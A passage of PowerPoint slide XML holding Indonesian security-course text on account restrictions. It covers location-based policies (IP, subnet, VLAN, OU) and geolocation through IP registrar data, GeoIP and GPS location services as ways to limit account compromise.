      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3218312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Pembatasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Akun</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pembatasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memitigasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembobolan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencurian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Lokasi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Seorang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>logis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP, subnet, virtual LAN (VLAN), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> unit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (OU). Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembatasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OU yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Lokasi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>geografis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihitung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>geolokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Alamat IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikaitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda-beda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipublikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendaftar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> nama, negara, wilayah, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kota</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pendaftar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Internet (ISP), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perkiraan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ISP. Jika ISP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melayani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> wilayah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>geografis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beragam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Internet (ISP). Pustaka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>GeoIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memfasilitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghitung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>posisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>geografis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sensor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemosisian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> global (GPS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melaporkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akurat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
